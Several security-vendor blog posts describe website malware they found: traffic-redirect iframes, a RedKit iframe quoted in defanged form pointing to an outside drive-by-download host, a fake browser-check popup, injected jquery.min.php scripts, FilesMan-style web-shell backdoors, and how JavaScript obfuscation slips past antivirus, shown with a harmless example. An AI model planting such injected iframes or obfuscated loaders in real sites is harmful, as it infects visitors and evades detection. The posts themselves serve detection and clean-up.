Traffic Redirection Malware On Website

Traffic Distribution System (TDS) On Infected Websites

This malware technique is widely used to monitor and redirect traffic from compromised website to malicious content or paid referrals. In past, we highlighted similar cases in our blog: Blacklisted website used to drive traffic to 'penny stock website'

Malicious TDS flow

Background

ThreatSign! client received complaint from his customer that his website got blocked when accessed from Google Chrome. 

Malware details

Upon internal malware scan the infection was identified inside WordPress theme. Obfuscated malicious code generated hidden iframe redirecting visitors to TDS from where they got landed on 3d party pages depending on location, web browser type and other parameters. In some cases, user gets redirected to fake Adobe player download page.

Obfuscated Malicious JavaScript Code

Decoded Malicious Iframe

VirusTotal report : https://virustotal.com/en/url/0a2d7c043097045c7e3ed1e0fb3ca6c48942223a342d66f35afed8f3d365ef3c/analysis/1461252848/

Detection rate

Malware clean-up

Search for similar code inside your WordPress theme. If you suspect that your website was infected by this or similar malware please select from our Website Anti-malware Monitoring plans and our experts will be happy to clean it up for you.

RedKit Malware Still Alive

RedKit Malware Still Alive

RedKit as detected by Online Malware Scanner

Background

Back in 2013, we posted about RedKit infecting significant number of websites. It appears that, three years later, the statistics of the websites submitted to online malware scanner show the revive of this malware among infected websites. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware entry

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://brg-catalogues[.]com/mzcf.html?j=1886263>

The URL in src of the iframe hosts another ~15 similar HTML pages (mzcf.html) leading to drive-by-download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:

Google report - 1

Google report - 2

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware, Quttera experts are always happy to clean it for you - Malware Monitoring & Cleanup Plans For Websites

Malicious JavaScript Popup On WordPress Websites

Malicious JavaScript Popup On WordPress Websites

This infection pulled out from the malicious websites list submitted by users to our free Online Website Malware Scanner. If your website visitors complain that they experience the same when they access your website, then probably you were hit by the same malware.

Note: since the scan was completely outside-in (HTTP-based) we're not posting here the PHP portion of the malware. 

Malicious Redirect

When this infection loads, your website visitor gets presented with the "Checking your browser" window (see below screenshot). A "Continue" button is there, asking for the user-action in order to complete this stage of the attack. When user clicks this button, it generates random URL that points to another page located on the same server. The URL will have the prefix ?pagerd_

e.g. www.infected-domain.com/?pagerd_dclw7h

Malicious JavaScript Popup

When investigating further and following such generated link, we got the following PHP errors:

Pointing out the malware in infected footer.php file of the installed WordPress theme. 

Summary

Above info shows the path to detect and remove the discussed malware. In order to stay safe and avoid future infection it is essential to keep all passwords safe, WordPress files up to date and of course use only trusted and constantly updated/fixed plugins and themes.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

jquery min php massive malware infection

Jquery.min.php Massive Infection Of WordPress And Joomla Websites

Background

During malware cleanup from our clients websites, same infection was noticed again and again. Additionally, when reviewing latest malicious scan reports in our Online Website Malware Scanner it could be seen that almost every third website is infected with this "disguised jquery" injection. To see this, just look at latest submissions by visitors (last 2-3 hours) and click View Code link in the Threat Dump section of the report.

Hence this short post is to help you identify this malware on your website and avoid getting blacklisted.

Malicious Payload

Being injected before the <head> tags on both WordPress and Joomla platform, this malicious script generates links to malware components on 3D party infected websites. This is common technique to break the malicious code into portions and host each one on different websites in malicious chain allows to replace the code origin each time, e.g. based on clock.

jquery.min.php malware script

How to prevent the (re) infection

Everyday, attackers find new ways to hide Backdoors so it is safe to follow there rules to improve your protection:

1. Backup your site
2. Keep your CMS version up to date.
3. Change you passwords periodically. Most hackers try to brute force the credentials.
4. Change Table Prefix of database. This will avoid SQL injections.
5. Add additional security by modifying .htaccess.
6. In case of WordPress it is recommended to run periodically both internal and external scans with our plugin.
7. Always keep plugins and themes updated to latest version.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

Bypassing Antivirus Detection With JavaScript Obfuscation

JavaScript Code Obfuscation Or How To Bypass Antivirus Detection

A one liner definition of obfuscation from Wikipedia:

In software development, obfuscation is the deliberate act of creating obfuscated code, i.e. source or machine code that is difficult for humans to understand.

Obfuscated JavaScript code is a widely used technique to hide initial functionality of a given script. There is nothing malicious in obfuscation itself. Its valid use can be to protect intellectual property of a developer or a company implemented given script or library; to compress code; to decrease size of downloaded web page; and etc.

Due to its popularity there are plenty of free online obfuscators that easily translate simple JavaScript code to something unreadable and mostly impossible for human understanding.

Let's run a simple example:

We have a simple JavaScript snippet. All that it does is showing the message window with string "Obfuscated string"
We can have something like this:

1. var a="Obfuscated string";
2. function msg(m){alert(m);}
3. msg(a);

Passing this script through freely available online obfuscators http://javascriptobfuscator.com/ and http://javascriptcompressor.com/ gives us two completely different outputs:

var _0x86eb=["\x4F\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x73\x74\x72\x69\x6E\x67"]; var a=_0x86eb[0];function msg(_0x988dx3){alert(_0x988dx3);} ;msg(a);

and

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 0="4 5";6 1(2){7(2)}1(0);',8,8,'a|msg|m|var|Obfuscated|string|function|alert'.split('|'),0,{}))

Not we can go further and pass the output of the first obfuscator through the second one which will give us result even more far different from the original script:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 4=["\\9\\c\\i\\k\\2\\7\\8\\3\\b\\l\\d\\2\\3\\e\\f\\g\\h"];1 a=4[0];j 5(a){6(a)};5(a);',22,22,'|var|x73|x74|_0x86eb|msg|alert|x63|x61|x4F||x65|x62|x20|x72|x69|x6E|x67|x66|function|x75|x64'.split('|'),0,{}))

This far, without any special skills required, we have converted original source code to something completely not related and "unreadable". Our intellectual property is safe and unless, of course, a group of hackers will spent time dedicated to de-obfuscation (there are no 100% proof targets as history shows).

Hiding malicious code in the web

Unfortunately, JavaScript obfuscation is used not only for legal and legitimate purposes. Almost every exploit kit (for example http://en.wikipedia.org/wiki/Blackhole_exploit_kit) utilizes JavaScript obfuscation algorithms in order bypass antivirus protection and invisibly inject malware into victim PC or touch devices.

Worth mentioning website malware cases are being collected with public online Website Malware Scanner. Some cases of execution flow of JavaScript threats:

http://pastebin.com/uMX957TZ
http://pastebin.com/6ByZH4GT
http://pastebin.com/VPkKXeMJ

Looking at the analysis we can see that the target of all these threats is to inject hidden iframe, which finally redirects visitors browser to malware distribution server. Successful attack results in silently installed malware on PC or touch devices that were used to visit infected web site.

So why JavaScript obfuscation bypass antivirus detection?

Fairly, there are few integral parts playing a major role in this puzzle. First of all JavaScript itself is simple and very rich language that provides possibility for dynamic generation and execution of script code using eval and unescape methods. This fact backed with all modern obfuscation techniques make it simply impossible to detect such payload using pattern-based engines utilized by antiviruses.

Antiviruses are still an essential part of the secure perimeter as they capable to prevent accessing links to known infected web servers that distribute malware. Obviously, the remaining issue here is that thousands of new web servers hacked and compromised day by day while it take some amount of time until such web servers get listed in antivirus blacklist.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

FilesMan Backdoor Malware On Your Computer

FilesMan is being abused in the wild

What is FilesMan? It is a File Manager used to explore the files in a computer. It is the most basic malware tool that attackers upload to your website as a form of backdoor to browse your files. Some of these File Managers are sophisticated and has their own GUI (Graphical User Interface), some are capable of uploading and downloading files from your website as if the attackers were in front of your computer browsing it personally.

Do I have this malware on my website?

So how do you spot if your website has it? A string search for "FilesMan" would actually do the trick. However, most of the attackers use heavy obfuscation so that you can't detect it by simple string searching. You may also want to look for split strings. This technique is also widely used to outsmart string searching by site owners.

This is an example of an ordinary FilesMan that can be searched throughout your system:

FilesMan backdoor malware

While this one has been concatenated and can still be searched by using regular expression:

FilesMan obfuscated with string split applied.

Other well known File Managers that are being abused in the wild has GUI and can be found mostly anywhere on the internet:

C99 Madshell:

C99 Madshell

b374k-shell:

b374k

How to prevent the infection

Everyday, attackers find new ways to hide backdoors so it is safe to follow there rules to improve your protection:

1. Backup your site.
2. Keep your CMS version up to date.
3. Change you passwords periodically. Most hackers try to brute force the credentials.
4. Change Table Prefix of database. This will avoid SQL injections.
5. Add additional security by modifying .htaccess.
6. In case of WordPress it is recommended to run periodically both internal and external scans with our plugin.
7. Always keep plugins and themes updated to latest version.

Still got infected and/or blacklisted?

No worries. There are no bulletproof websites. Here at Quttera we're cleaning this and other kinds of malware on a daily basis. If you'd like our malware analysts to help you, just select appropriate ThreatSign! anti-malware plan and get back online.

For other issues and help: Quttera's help-desk